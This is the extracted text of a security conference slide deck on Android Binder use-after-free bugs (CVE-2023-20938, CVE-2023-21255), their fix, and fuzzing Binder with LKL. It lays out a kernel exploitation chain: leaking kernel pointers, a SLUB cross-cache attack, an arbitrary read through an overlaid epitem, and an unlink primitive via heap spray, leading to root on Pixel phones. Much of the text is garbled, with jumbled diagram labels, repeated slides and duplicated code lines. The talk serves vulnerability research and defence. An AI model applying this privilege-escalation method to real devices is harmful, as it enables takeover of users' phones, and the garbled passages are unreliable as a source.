Offensivecon 24 Binder
Offensivecon 24 Binder
10-May-2024
Agenda
Proprietary + Confidential
Who we are
Proprietary + Confidential
What is Binder?
App
RPC System Services RPC
System Services Untrusted App
libbinder System Service
(Binder userspace library)
Kernel
Process A Process B
4. Perform RPC Calls
MyService.myMethod(args)
MyService IMyService
/dev/binder
(Kernel) 2. Binder creates a Node 3. Binder creates a Ref
write_size = sizeof(write_buffer)
read_buffer …
● Transfer Binder objects between the IPC …
target.handle =0 0 8 12
○ Binder Node
buffer struct flat_binder_object struct binder_fd_object …
○ Binder Ref offsets
… …
Proprietary + Confidential
Vulnerability Description (1)
● When sending a transaction, Binder translates objects to another form
○ Translate a Binder Node to a Binder Ref or vice versa
○ Install new file descriptors in another process for file sharing
binder_size_t buffer_offset = 0;
if (!IS_ALIGNED(tr->offsets_size, sizeof(binder_size_t))) {
goto err_bad_offset;
}
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
buffer_offset += sizeof(binder_size_t)) {
// ...
}
err_bad_offset:
binder_transaction_buffer_release(target_proc, NULL, t->buffer,
buffer_offset, /*is_failure*/true);
Vulnerability Description (2)
● If an error occurs in the loop, we need to clean all objects translated so far
● Cleanup function is passed the offset in the buffer it’s reached and is_failure
set to true
binder_size_t buffer_offset = 0;
if (!IS_ALIGNED(tr->offsets_size, sizeof(binder_size_t))) {
goto err_bad_offset;
}
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
buffer_offset += sizeof(binder_size_t)) {
// if error: goto err_bad_offset
}
err_bad_offset:
binder_transaction_buffer_release(target_proc, NULL, t->buffer,
buffer_offset, /*is_failure*/true);
Vulnerability Description (3)
● What happens if an error happens before any objects are processed?
binder_size_t buffer_offset = 0;
if (!IS_ALIGNED(tr->offsets_size, sizeof(binder_size_t))) {
goto err_bad_offset;
}
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
buffer_offset += sizeof(binder_size_t)) {
// if error: goto err_bad_offset
}
err_bad_offset:
binder_transaction_buffer_release(target_proc, NULL, t->buffer,
buffer_offset, /*is_failure*/true);
Vulnerability Description (4)
False
Validate
transaction
True
True
Side-effect:
Translate
Increment Node
Ref to Node
reference counters
Finish
binder_transaction
Vulnerability Explained (Initial State)
Thread A /dev/binder (Kernel) Thread B
Pending Transaction
(Ref) 0xbeef
Pending Transaction
To: Thread A’s Node Translate To: Thread A’s Node ioctl
Pending Transaction
(Node) 0xbeef
Send Node instead of Ref
with unaligned offsets_size
Pending Transaction
To: Thread A’s Node Error path To: Thread A’s Node ioctl
Pending Transaction
Pending Transaction
Killed Thread B
Thread A State
Pending Transaction
Killed Thread B
Thread A State
Pending Transaction
MyService Node
Node 0xbeef
0xbeef
(0xbeef) Refcount
Freed 01
Vulnerability Explained (Attacker Workflow)
Thread A /dev/binder (Kernel)
Thread A State
Pending Transaction
MyService Node
Node 0xbeef
0xbeef
(0xbeef) Refcount
Freed 01
CVE-2023-20938 Remediation
True True
Translate Translate
Ref to Node Ref to Node
True True
“Untranslate” “Untranslate” More
More
All objects & All objects & object?
object?
rollback state rollback state
False False
Finish Finish
binder_transaction binder_transaction
Discovery of CVE-2023-21255
● The fuzzer identified another test case triggering the same UAF issue
○ Send a valid transaction with a binder node to pollute the binder kernel buffer
○ Send the malformed transaction with misaligned offsets to trigger the error path
■ binder_transaction_buffer_release would roll back the binder node translation at
the previous step => UAF
[1] https://source.android.com/docs/security/bulletin/2023-07-01#kernel
Exploitation
Proprietary + Confidential
Exploitation Steps
[1] https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/
Leak Primitive
static int binder_thread_read(...)
struct binder_transaction_data_secctx tr;
struct binder_transaction_data *trd = &tr.transaction_data;
...
trd->target.ptr = target_node->ptr; [1]
trd->cookie = target_node->cookie; [1]
...
if (copy_to_user(ptr, &tr, trsize)) { [2]
struct binder_node
Thread A (dangling node)
To: Thread A
…
trd.target.ptr
0x1337 uintptr_t ptr 88
trd.cookie
0x1337 uintptr_t cookie 96
Userspace Kernel …
Leak Primitive
static int binder_thread_read(...)
struct binder_transaction_data_secctx tr;
struct binder_transaction_data *trd = &tr.transaction_data;
...
trd->target.ptr = target_node->ptr; [1]
trd->cookie = target_node->cookie; [1]
...
if (copy_to_user(ptr, &tr, trsize)) { [2]
struct binder_node
Thread A [2] (dangling node)
To: Thread A
…
Dangling Pointer
To: Thread A
trd.target.ptr
trd.cookie
Leak Primitive
1. Exploit the vulnerability to free a binder_node
2. Allocate a kernel object at the same memory location
3. Leak values of a kernel object (at offset 88 and 96)
Kernel Address Space
Dangling Pointer
To: Thread A struct
struct
binder_node
epitem
trd.target.ptr
88 uintptr_t
struct
ptrlist_head
ptr *next
trd.cookie
96 struct
uintptr_t
list_head
cookie cookie *prev
Allocate a kernel object
from the same memory
Leak Primitive
1. Exploit the vulnerability to free a binder_node
2. Allocate a kernel object at the same memory location
3. Leak values of a kernel object (at offset 88 and 96)
Kernel Address Space
Dangling Pointer
To: Thread A struct
struct
binder_node
epitem
trd.target.ptr
next
88 uintptr_t
struct
ptrlist_head
ptr *next
trd.cookie
prev
96 struct
uintptr_t
list_head
cookie cookie *prev
Allocate a kernel object
from the same memory
Leak Primitive
How can we overlay another kernel object (epitem) onto the freed binder_node?
● Much easier in userspace (e.g. glibc)
○ malloc uses the same freelist regardless of object types
● Linux Kernel is more complicated: SLUB allocator
○ Different object types can be allocated from different caches
● Many mitigations enabled in recent years
○ CONFIG_SLAB_FREELIST_HARDENED
○ CONFIG_SLAB_FREELIST_RANDOM
○ GFP_KERNEL_ACCOUNT*
○ No more cache aliasing for `epitem` (SLAB_ACCOUNT)
○ No unprivileged userfaultd (for heap spraying)
* Removed in 5.9 and added back in 5.14 (we’re targeting 5.10)
Cross-cache Attack (SLUB Allocator)
Physical Memory
Allocate
Free
Cross-cache Attack (SLUB Allocator)
Page Allocator
(Buddy Allocator)
Per-CPU
Page Cache
Physical Memory
Allocate
Free
Cross-cache Attack (SLUB Allocator)
Page Allocator SLUB Allocator
(Buddy Allocator)
kmem_cache (kmalloc-128)
Per-CPU
Page Cache kmem_cache_cpu
Physical Memory
Active Slab
Partial Slabs
kmem_cache (eventpoll_epi)
Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
Page Allocator SLUB Allocator
(Buddy Allocator)
kmem_cache (kmalloc-128)
Per-CPU
Page Cache kmem_cache_cpu
Physical Memory
Active Slab
Partial Slabs
kmem_cache (eventpoll_epi)
Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
Page Allocator SLUB Allocator
(Buddy Allocator)
kmem_cache (kmalloc-128) slab
Per-CPU
Page Cache kmem_cache_cpu
Physical Memory
Active Slab
Partial Slabs …
kmem_cache (eventpoll_epi)
Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
Page Allocator SLUB Allocator
(Buddy Allocator)
kmem_cache (kmalloc-128) slab
struct binder_node
Per-CPU
Page Cache kmem_cache_cpu
Physical Memory
Active Slab
Partial Slabs …
kmem_cache (eventpoll_epi)
Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
Page Allocator SLUB Allocator
(Buddy Allocator)
kmem_cache (kmalloc-128) slab
struct binder_node
Per-CPU
Page Cache kmem_cache_cpu
Physical Memory
Active Slab
Partial Slabs …
kmem_cache (eventpoll_epi)
Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
Page Allocator SLUB Allocator
(Buddy Allocator) Dangling pointer
Dangling Node
Per-CPU
Page Cache kmem_cache_cpu
Physical Memory
Active Slab
Partial Slabs …
kmem_cache (eventpoll_epi)
Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
x1000+
Page Allocator SLUB Allocator
(Buddy Allocator) Dangling pointer
Dangling Node
Per-CPU
Dangling Node
Page Cache kmem_cache_cpu
Physical Memory
Dangling Node
Active Slab
Partial Slabs …
kmem_cache (eventpoll_epi)
Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
x1000+
Page Allocator SLUB Allocator
(Buddy Allocator) Dangling pointer
Dangling Node
Per-CPU
Dangling Node
Page Cache kmem_cache_cpu
Physical Memory
Dangling Node
Active Slab
Partial Slabs …
kmem_cache (eventpoll_epi)
Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
x1000+
Page Allocator
(Buddy Allocator) Dangling pointer
kmem_cache (kmalloc-128)
Per-CPU
Page Cache kmem_cache_cpu
Physical Memory
Active Slab
Partial Slabs
kmem_cache (eventpoll_epi)
Allocate
kmem_cache_cpu
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
x1000+
Page Allocator SLUB Allocator
(Buddy Allocator) Dangling pointer
kmem_cache (kmalloc-128)
Per-CPU
Page Cache kmem_cache_cpu
Physical Memory
Active Slab
Partial Slabs
Dangling Node
kmem_cache (kmalloc-128)
Per-CPU
Page Cache kmem_cache_cpu
Physical Memory
Active Slab
Partial Slabs
Dangling Node
https://youtu.be/VJWEUsTDtuc
Arbitrary Read
Use Leak Primitive to leak a pointer to a struct file
struct epitem
…
88
*next
96
*prev
…
Arbitrary Read
Use Leak Primitive to leak a pointer to a struct file
… … …
88 88
*next *next *next
96 96
*prev *prev *prev
… … …
Arbitrary Read
ioctl(fd, FIGETBSZ, &value); // &value == argp
struct file
f_ep_links.next s_blocksize
i_sb
f_ep_links.prev …
…
…
Arbitrary Read
ioctl(fd, FIGETBSZ, &value); // &value == argp
struct file
… struct epitem
…
struct inode struct super_block
inode
40 bytes 40 bytes 24 bytes
f_ep_links.next s_blocksize
i_sb event.data
f_ep_links.prev …
… Can be modified directly
… with epoll_ctl() syscall
Arbitrary Read
ioctl(fd, FIGETBSZ, &value); // &value == argp
… struct epitem
…
struct super_block
inode
40 bytes 24 bytes
f_ep_links.next s_blocksize
event.data
f_ep_links.prev …
Can be modified directly
… with epoll_ctl() syscall
Unlink primitive
1. Exploit the vulnerability to create a dangling Node.
2. Allocate a fake binder_node with sendmsg() syscall (heap spray).
Dangling Pointer
struct binder_node
Unlink primitive
1. Exploit the vulnerability to create a dangling Node.
2. Allocate a fake binder_node with sendmsg() syscall (heap spray).
Dangling Pointer
struct binder_node fake binder_node
ptr
Allocate a kernel object cookie
with data we controlled
(heap spray)
Unlink primitive
● Use-after-free when decrementing the refcount of a binder_node
}
Root Privilege Escalation
Proprietary + Confidential
VIDEO DEMONSTRATION OF FULL EXPLOIT ON
PIXEL 6 PRO & PIXEL 7 PRO
https://youtu.be/7qFb6RUHnnU
Fuzzing Binder
with Linux Kernel Library (LKL)
Proprietary + Confidential
Binder Fuzzing
scatter x
Data dependencies y
● Binder commands
struct struct struct
● Scatter-gather data structures binder_buffer_object binder_buffer_object binder_buffer_object
kernel space
[1] https://github.com/lkl/linux
[2] Xu et al., Fuzzing File Systems via Two-Dimensional Input Space Exploration
[3] https://github.com/atrosinenko/kbdysch Host kernel
Linux Android Windows
Anatomy of LKL fuzzer
LKL enables fuzzing Linux kernel
GNU Linux x86_64 user-space process
code in user-space
● Use in-process fuzzing engine, such as Fuzzing coverage
libFuzzer & crash detection
Advantages
Linux kernel + KASan
● High fuzzing performance on x86_64 libFuzzer-based
● Ease of custom modifications Binder fuzzing harness
○ e.g. mocking hardware, custom device driver
scheduler(?)
Limitations
Fuzz data
● No SMP in LKL
● x86_64 vs aarch64 -- potential false
positives, false negatives
Using LKL from your C program
int ret = lkl_start_kernel(&lkl_host_ops, "mem=50M");
lkl_mount_fs("sysfs");
lkl_mount_fs("proc");
lkl_mount_fs("dev");
lkl_mount_fs("sysfs");
lkl_mount_fs("proc");
lkl_mount_fs("dev");
lkl_mount_fs("sysfs");
lkl_mount_fs("proc");
lkl_mount_fs("dev");
lkl_mount_fs("sysfs");
lkl_mount_fs("proc");
lkl_mount_fs("dev");
...
Deterministically simulate thread
interleaving based on fuzz data1 yield
● mutex_lock, mutex_unlock
unlock
yield
schedule schedule
[1] Williamson, N., Catch Me If You Can: Deterministic Discovery of
Race Conditions with Fuzzing. Black Hat USA, (2022). lock
Results
Proprietary + Confidential